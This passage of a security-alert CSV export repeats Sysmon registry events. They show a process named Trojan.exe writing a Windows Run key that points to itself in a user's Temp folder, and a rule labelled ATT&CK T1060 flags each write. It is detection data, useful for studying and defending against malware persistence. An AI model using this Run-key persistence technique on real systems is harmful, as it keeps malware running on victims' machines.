HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:49.858"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:02.038",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:48.852 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:48.855394700Z"",""eventRecordID"":""1261"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:48.852\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:48.852"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:01.219",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:47.714 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:47.784436700Z"",""eventRecordID"":""1260"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:47.714\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:47.714"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:59.864",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:46.131 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:46.141602000Z"",""eventRecordID"":""1259"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:46.131\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:46.131"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:58.343",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:45.092 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:45.118059300Z"",""eventRecordID"":""1258"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:45.092\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:45.092"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:57.249",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:43.988 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:43.993861500Z"",""eventRecordID"":""1256"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:43.988\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:43.988"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:56.130",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:42.982 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:42.983857800Z"",""eventRecordID"":""1254"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:42.982\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:42.982"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:55.128",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:41.974 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:41.981259300Z"",""eventRecordID"":""1253"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:41.974\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:41.974"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:54.088",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:40.951 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:40.976837000Z"",""eventRecordID"":""1252"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:40.951\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:40.951"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:53.201",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:39.925 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:39.927552800Z"",""eventRecordID"":""1249"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:39.925\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:39.925"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:52.192",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:38.810 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:38.812429200Z"",""eventRecordID"":""1247"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:38.810\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:38.810"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:51.399",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:37.793 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:37.804952100Z"",""eventRecordID"":""1246"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:37.793\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 